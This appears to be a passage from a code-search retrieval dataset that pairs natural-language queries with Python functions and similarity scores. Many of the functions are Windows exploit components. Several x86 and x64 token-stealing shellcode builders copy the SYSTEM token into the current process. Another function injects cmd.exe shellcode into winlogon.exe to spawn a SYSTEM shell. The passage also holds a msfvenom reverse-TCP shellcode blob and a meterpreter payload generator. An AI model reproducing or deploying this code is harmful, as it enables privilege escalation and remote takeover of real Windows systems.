crexc.MappingFormatError(\"selector must be a dict or a Selector.\")", "def fetch_execute(self):\n\n op_code = self.mem.read(self.reg.ip)\n self.reg.ip_inc()\n addr = self.mem.read(self.reg.ip)\n self.reg.ip_inc()\n\n # Execute the instruction on addr.\n self.op_codes[op_code.num](addr)", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def zero_opcodes(self):\n if self.opcode == 0x00E0:\n self.display.clear_display()\n logger.info(\"Cleared display\")\n elif self.opcode == 0x00EE:\n logger.info(\"Returned from subroutine at {}\".format(hex(self.pc)))\n self.pc = self.stack[self.stack_pointer]\n self.stack.pop()\n self.stack_pointer -= 1\n logger.info(\"to address at {}\".format(hex(self.pc)))", "def generate_64bits_execution_stub_from_syswow(x64shellcode):\n current_process = windows.current_process\n if not current_process.is_wow_64:\n raise ValueError(\"Calling generate_64bits_execution_stub_from_syswow from non-syswow process\")\n\n transition64 = x64.MultipleInstr()\n transition64 += x64.Call(\":TOEXEC\")\n transition64 += x64.Mov(\"RDX\", \"RAX\")\n transition64 += x64.Shr(\"RDX\", 32)\n transition64 += x64.Retf32() # 32 bits return addr\n transition64 += x64.Label(\":TOEXEC\")\n x64shellcodeaddr = thread_state.allocator.write_code(transition64.get_code() + x64shellcode)\n\n transition = x86.MultipleInstr()\n transition += x86.Call(CS_64bits, x64shellcodeaddr)\n # Reset the SS segment selector.\n # We need to do that due to a bug in AMD CPUs with RETF & SS\n # https://github.com/hakril/PythonForWindows/issues/10\n # http://blog.rewolf.pl/blog/?p=1484\n transition += x86.Mov(\"ECX\", \"SS\")\n transition += x86.Mov(\"SS\", \"ECX\")\n transition += x86.Ret()\n\n stubaddr = thread_state.allocator.write_code(transition.get_code())\n exec_stub = ctypes.CFUNCTYPE(ULONG64)(stubaddr)\n return exec_stub", "def process(self, hrd, data):\n\t\teth = dpkt.ethernet.Ethernet(data)\n\t\ta = self.p.decode(eth)\n\t\tif a:\n\t\t\tself.map.append(a)", "def decode(self, h):\n return self.act_decode(self.linearD(h))", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in sections:\n st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def list():\n\n return cache.codeTableList()", "def code():", "def resolve_code(obj, _):\n return obj.code.decode()", "def inject_shellcode(winlogon_pid): \n \n # Get winlogon.exe pid\n pid = winlogon_pid\n\n # Get a handle to the winprinton process we are injecting into \n hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n if not hProcess:\n debug_print(\"\\t[-] Couldn't acquire a handle to PID: %s\" % pid)\n sys.exit()\n\n debug_print(\"\\n\\t[+] Obtained handle [0x%x] for the winlogon.exe process\" % hProcess)\n \n # Creating shellcode buffer to inject into the host process\n # https://packetstormsecurity.com/files/142572/Microsoft-Windows-32-bit-64-bit-cmd.exe-Shellcode.html\n SHELLCODE = (\n \"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x40\\x1c\\x8b\\x04\\x08\"\n \"\\x8b\\x04\\x08\\x8b\\x58\\x08\\x8b\\x53\\x3c\\x01\\xda\\x8b\\x52\\x78\\x01\"\n \"\\xda\\x8b\\x72\\x20\\x01\\xde\\x41\\xad\\x01\\xd8\\x81\\x38\\x47\\x65\\x74\"\n \"\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\"\n \"\\x64\\x64\\x72\\x65\\x75\\xe2\\x49\\x8b\\x72\\x24\\x01\\xde\\x66\\x8b\\x0c\"\n \"\\x4e\\x8b\\x72\\x1c\\x01\\xde\\x8b\\x14\\x8e\\x01\\xda\\x89\\xd6\\x31\\xc9\"\n \"\\x51\\x68\\x45\\x78\\x65\\x63\\x68\\x41\\x57\\x69\\x6e\\x89\\xe1\\x8d\\x49\"\n \"\\x01\\x51\\x53\\xff\\xd6\\x87\\xfa\\x89\\xc7\\x31\\xc9\\x51\\x68\\x72\\x65\"\n \"\\x61\\x64\\x68\\x69\\x74\\x54\\x68\\x68\\x41\\x41\\x45\\x78\\x89\\xe1\\x8d\"\n \"\\x49\\x02\\x51\\x53\\xff\\xd6\\x89\\xc6\\x31\\xc9\\x51\\x68\\x65\\x78\\x65\"\n \"\\x20\\x68\\x63\\x6d\\x64\\x2e\\x89\\xe1\\x6a\\x01\\x51\\xff\\xd7\\x31\\xc9\"\n \"\\x51\\xff\\xd6\"\n )\n\n sh = create_string_buffer(SHELLCODE, len(SHELLCODE))\n code_size = len(SHELLCODE) \n \n # Allocate some space for the shellcode (in the program memory)\n sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, \n PAGE_EXECUTE_READWRITE)\n if not sh_address:\n debug_print(\"\\t[-] Could not allocate shellcode in the remote process\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Allocated memory at address 0x%x\" % sh_address)\n\n # Inject shellcode in to winlogon.exe process space\n written = LPVOID(0)\n shellcode = DWORD(sh_address)\n dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, \n byref(written))\n if not dwStatus:\n debug_print(\"\\t[-] Could not write shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Injected %d bytes of shellcode to 0x%x\" % (written.value, sh_address))\n\n # Now we create the remote thread and point its entry routine to be head of \n # our shellcode\n thread_id = HANDLE(0)\n if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, \n byref(thread_id)):\n debug_print(\"\\t[-] Failed to inject shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n\n debug_print(\"\\t[+] Remote thread 0x%x created\" % thread_id.value)\n debug_print(\"\\t[+] Spawning SYSTEM shell...\")\n # Kill python process to kill the window and avoid BSODs\n #os.kill(os.getpid(), signal.SIGABRT)\n\n debug_print(\"\\n\\t\\t[*] Remote thread created with a thread ID of: [%x]\" % thread_id.value)\n debug_print(\"\\t\\t[+] ***BOOM!!\")", "def processJumpTable(jt_ea):", "def process_python(data, code):\n\tx=data\n\treturn eval(code)", "def rts_code_ptr(runtime_addr, runtime_addr_high=None):\n return code_ptr(runtime_addr, runtime_addr_high, offset=1)", "def getJumpTablesFromFunc(func_ea):", "def leak_shellcode(remote, shellcode):\n assert len(shellcode) == 3\n alloc_addr = get_current_allocation_addr(remote)\n send_receive(remote, '\\x93' + shellcode) # Start with xchg eax, ebx to leak us\n return alloc_addr + 6" ]
[ "0.60174304", "0.5950094", "0.56463164", "0.5519387", "0.5371425", "0.5347842", "0.5253339", "0.5197456", "0.516168", "0.5138188", "0.5085005", "0.5085005", "0.50311166", "0.4988512", "0.48932365", "0.48901132", "0.48380888", "0.48293492", "0.48163736", "0.48154366", "0.47775632", "0.47692195", "0.47690675", "0.47599098", "0.4745956", "0.47396538", "0.47364864", "0.47323087", "0.4731965", "0.4730474" ]
0.6675145
0
Retrun a token restore shellcode related to the platform
def restoretokenx86(RETVAL, extra = ""): (KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86() shellcode = ( "\x52" "\x33\xc0" # xor eax,eax "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] "\x8b\x15\x00\x09\x02\x00" "\x89\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+0xf8] "\x5a" ) if RETVAL == "": shellcode += "\xc3" #retn else: shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def decode_generated_root_token(encoded_token, otp):\n command = [\"vault\"]\n if vault_version_ge(\"0.9.6\"):\n # before Vault ~0.9.6, the generate-root command was the first positional argument\n # afterwards, it was moved under the \"operator\" category\n command.append(\"operator\")\n\n command.extend(\n [\n \"generate-root\",\n \"-address\",\n \"https://127.0.0.1:8200\",\n \"-tls-skip-verify\",\n \"-decode\",\n encoded_token,\n \"-otp\",\n otp,\n ]\n )\n process = subprocess.Popen(\n **get_popen_kwargs(args=command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n )\n\n stdout, stderr = process.communicate()\n logging.debug('decode_generated_root_token stdout: \"%s\"' % str(stdout))\n if stderr != \"\":\n logging.error(\"decode_generated_root_token stderr: %s\" % stderr)\n\n try:\n # On the off chance VAULT_FORMAT=json or such is set in the test environment:\n new_token = json.loads(stdout)[\"token\"]\n except ValueError:\n new_token = stdout.replace(\"Root token:\", \"\")\n new_token = new_token.strip()\n return new_token", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. Use env variable %s' % TOKEN_NAME)\n return token", "def get_code(self):\n self._payload_to_str()\n return self._str_payload", "def read_code() -> str:\n code = ''\n if settings.ZULIP_ENABLED:\n _code = zulip_read()\n if _code:\n logger.info(f'Read SMS Code from Zulip: {_code}')\n code = _code\n\n return code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def get_code(self):\n return self.code", "def read_idcode(device):\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 3, 0b0010)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n return device.read(4)[::-1].hex(\"_\") # return IDCODE", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['versioned_auth']['client_id'],\n 'redirect_uri': context.vendor_config['versioned_auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['versioned_auth'],\n context.conformance)", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['versioned_auth']['client_id'],\n 'redirect_uri': context.vendor_config['versioned_auth']['redirect_uri'],\n }\n\n fields.update(dict(context.table))\n\n context.response = token_request(fields,\n context.vendor_config['versioned_auth'],\n context.conformance)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token():\n return os.environ.get('TOKEN', None)", "def GetMachineKey():\n return platform.node()", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self, code):\n\n # live need post a form to get token\n headers = {'Content-type': 'application/x-www-form-urlencoded'}\n data = {\n 'client_id': get_config('login.live.client_id'),\n 'client_secret': get_config('login.live.client_secret'),\n 'redirect_uri': get_config('login.live.redirect_uri'),\n 'grant_type': 'authorization_code',\n 'code': code\n }\n # Following is use urllib to post request\n url = get_config('login.live.access_token_url')\n r = requests.post(url, data=data, headers=headers)\n resp = r.json()\n\n if resp.get(\"error\") is not None:\n raise Exception(resp)\n\n return resp[\"access_token\"]", "def read_idcode_opcode(device, idcode_opcode):\n opcode_length = len(idcode_opcode)\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00110)) # go to shift-ir\n data.extend((WRITE_BITS_NVE_LSB, opcode_length - 2, int(idcode_opcode))) # shift IDCODE opcode\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00111)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n idcode = device.read(4)[::-1]\n return \"\".join(format(byte, \"08b\") for byte in idcode)", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n fields.update(dict(context.table))\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def get_token_from_rpx(self):\n url_params = {'token_url' : ''}\n http_response = urllib2.urlopen(RPX_POPUP_URL, urllib.urlencode(url_params))\n import pdb;pdb.set_trace()", "def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))" ]
[ "0.6424091", "0.6397666", "0.6127926", "0.6111997", "0.6069528", "0.5585783", "0.5481146", "0.5443435", "0.54214656", "0.5419342", "0.5419342", "0.5419342", "0.5419342", "0.5402531", "0.53439623", "0.53102636", "0.5277562", "0.52706194", "0.52654016", "0.5255049", "0.5221615", "0.5221615", "0.5198671", "0.5157412", "0.51517206", "0.51470906", "0.5147007", "0.51197046", "0.51157284", "0.51110613" ]
0.7274014
0
Retrun a token stealing shellcode related to the platform
